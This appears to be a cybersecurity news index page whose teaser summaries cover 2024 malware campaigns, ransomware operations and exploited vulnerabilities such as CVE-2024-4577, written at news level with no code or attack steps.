A malvertising campaign is exploiting trojanized installers of popular software like Google Chrome and Microsoft Teams to deploy a backdoor known as Oyster (also referred to as Broomstick or CleanUpLoader). The researchers discovered that cybercriminals are creating lookalike websites hosting these malicious payloads. Users are redirected to these sites after searching for the software on …

Oyster Backdoor Spread via Fake Software Downloads Read More »

NiceRAT Malware Infect Devices via Cracked Software

Cybercriminals have been deploying a malware named NiceRAT to infect devices and incorporate them into a botnet, specifically targeting users in South Korea. The malware is spread under the guise of cracked software, such as pirated versions of Microsoft Windows or tools claiming to offer license verification for Microsoft Office. According to the report, the …

NiceRAT Malware Infect Devices via Cracked Software Read More »

Fog Ransomware Hits Education Sector via Breached VPNs

In early May 2024, a new ransomware operation named ‘Fog’ began targeting educational organizations in the U.S. by exploiting compromised VPN credentials. The operation has yet to set up an extortion portal and was initially not observed stealing data. The gang does steal data to use in double-extortion attacks, coercing victims into paying ransoms. The …

Fog Ransomware Hits Education Sector via Breached VPNs Read More »

PhantomLoader Used to Spread SSLoad Malware

Cybercriminals are using a newly discovered loader called PhantomLoader to distribute the nascent malware SSLoad, according to the report. Researchers reported that PhantomLoader is integrated into legitimate DLLs, often EDR or AV products, through binary patching and self-modifying techniques to evade detection. SSLoad, likely marketed under a Malware-as-a-Service (MaaS) model due to its various delivery …

PhantomLoader Used to Spread SSLoad Malware Read More »

Compromised Sites Spreading BadSpace Windows Backdoor

Hackers are leveraging legitimate-but-compromised websites to deploy a Windows backdoor called BadSpace, disguising it as fake browser updates. According to the report, the attackers use a multi-stage approach involving an infected website, a command-and-control (C2) server, a fake browser update, and a JScript downloader to install the backdoor on the victim’s system. The details of …

Compromised Sites Spreading BadSpace Windows Backdoor Read More »

Scattered Spider Hackers Target Cloud Apps for Data Theft

The Scattered Spider gang, also known as Octo Tempest, 0ktapus, Scatter Swine, and UNC3944, has shifted its focus to stealing data from software-as-a-service (SaaS) applications and creating new virtual machines to establish persistence in their attacks. Traditionally known for social engineering tactics such as SMS phishing, SIM swapping, and account hijacking to gain on-premise access, …

Scattered Spider Hackers Target Cloud Apps for Data Theft Read More »

Linux Malware Uses Emojis on Discord for Control

A recently identified Linux malware, named ‘DISGOMOJI,’ employs an innovative method of using emojis to execute commands on compromised systems, specifically targeting government agencies in India. Cybersecurity firm uncovered the malware, attributing it to a Pakistan-based threat actor referred to as ‘UTA0137.’ Volexity’s analysis in 2024 revealed a cyber-espionage campaign by UTA0137, which is believed …

Linux Malware Uses Emojis on Discord for Control Read More »

Cybercriminals Use Free Software Lures to Deploy Malware Loader

Cybercriminals are enticing users with free or pirated versions of commercial software to install a malware loader known as Hijack Loader, which subsequently deploys the Vidar Stealer information stealer. Researcher revealed that adversaries tricked users into downloading password-protected archive files containing trojanized copies of the Cisco Webex Meetings App (ptService.exe). When victims extracted and executed …

Cybercriminals Use Free Software Lures to Deploy Malware Loader Read More »

Fake Chrome Errors Install Malware via PowerShell Scripts

A recent malware campaign employs deceptive error messages from Google Chrome, Word, and OneDrive to trick users into executing malicious PowerShell scripts that install malware. This campaign has been linked to various threat actors, including ClearFake, a new attack cluster called ClickFix, and TA571, known for large-scale email spam leading to malware and ransomware infections. …

Fake Chrome Errors Install Malware via PowerShell Scripts Read More »

CISA Alert: Windows Vulnerability Exploited in Ransomware Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has flagged a significant Windows vulnerability, identified as CVE-2024-26169, that is being actively exploited in ransomware attacks. This flaw, now classified as a zero-day, involves improper privilege management in the Windows Error Reporting service, allowing local attackers to gain SYSTEM permissions through straightforward, low-complexity attacks that do …

CISA Alert: Windows Vulnerability Exploited in Ransomware Attacks Read More »

DarkGate Malware Adopts AutoHotkey in New Cyber Attacks

In recent cyber attacks, the DarkGate malware-as-a-service (MaaS) operation has transitioned from using AutoIt scripts to an AutoHotkey mechanism for its final payload delivery. This change highlights the ongoing efforts of threat actors to evade detection. Version 6 of DarkGate, released in March 2024 by developer RastaFarEye, showcases this update. RastaFarEye has been offering DarkGate …

DarkGate Malware Adopts AutoHotkey in New Cyber Attacks Read More »

Massive Cyber Attack Cripples Over 600,000 Routers in the U.S.

A mysterious cyber attack has left over 600,000 small office/home office (SOHO) routers offline, disrupting internet access for many users in the U.S. The attack, which occurred between October 25 and 27, 2023, targeted a single internet service provider (ISP). The affected routers include the ActionTec T3200, ActionTec T3260, and Sagemcom models issued by the …

Massive Cyber Attack Cripples Over 600,000 Routers in the U.S. Read More »

Critical PHP Flaw Allows Remote Code Execution on Servers

A significant security flaw has been discovered in PHP, posing a risk of remote code execution on Windows servers. The vulnerability, identified as CVE-2024-4577, affects all PHP versions on Windows and is categorized as a CGI argument injection flaw. According to the security researcher, this issue enables attackers to bypass protections established for a previous …

Critical PHP Flaw Allows Remote Code Execution on Servers Read More »

Advanced LightSpy Spyware Variant Targets macOS

Cybersecurity experts have discovered an advanced macOS variant of the LightSpy spyware, previously known for targeting iOS users. Research teams uncovered this previously undocumented variant, revealing that the LightSpy framework is capable of infecting multiple platforms, including Android, iOS, Windows, macOS, Linux, and various routers. The attackers utilized publicly available exploits (CVE-2018-4233 and CVE-2018-4404) to …

Advanced LightSpy Spyware Variant Targets macOS Read More »

FBI Releases 7,000 LockBit Ransomware Decryption Keys to Aid Victims

The FBI has revealed that it possesses over 7,000 decryption keys for the LockBit ransomware, enabling victims to recover their data for free. LockBit, a notorious ransomware group, has been linked to more than 2,400 global attacks, with at least 1,800 affecting U.S. entities. In February, the U.K. National Crime Agency (NCA) led an international …

FBI Releases 7,000 LockBit Ransomware Decryption Keys to Aid Victims Read More »

New ‘Warmcookie’ Windows Backdoor Spreads via Fake Job Offers

A new Windows malware named ‘Warmcookie’ is being distributed through fake job offer phishing campaigns, targeting corporate networks. Researcher discovered this threat, noting its capabilities for extensive machine fingerprinting, screenshot capturing, and deploying additional payloads. The ongoing campaign sees threat actors creating new domains weekly to support their operations, using compromised infrastructure to send phishing …

New ‘Warmcookie’ Windows Backdoor Spreads via Fake Job Offers Read More »

CatDDoS Botnet and DNSBomb DDoS Attack Technique Alert

Researchers have issued a warning about the CatDDoS malware botnet, which has exploited over 80 known security vulnerabilities in various software over the past three months to infiltrate devices and use them in distributed denial-of-service (DDoS) attacks. CatDDoS-related samples have leveraged numerous known vulnerabilities. The number of daily targets has exceeded 300. The vulnerabilities affect …

CatDDoS Botnet and DNSBomb DDoS Attack Technique Alert Read More »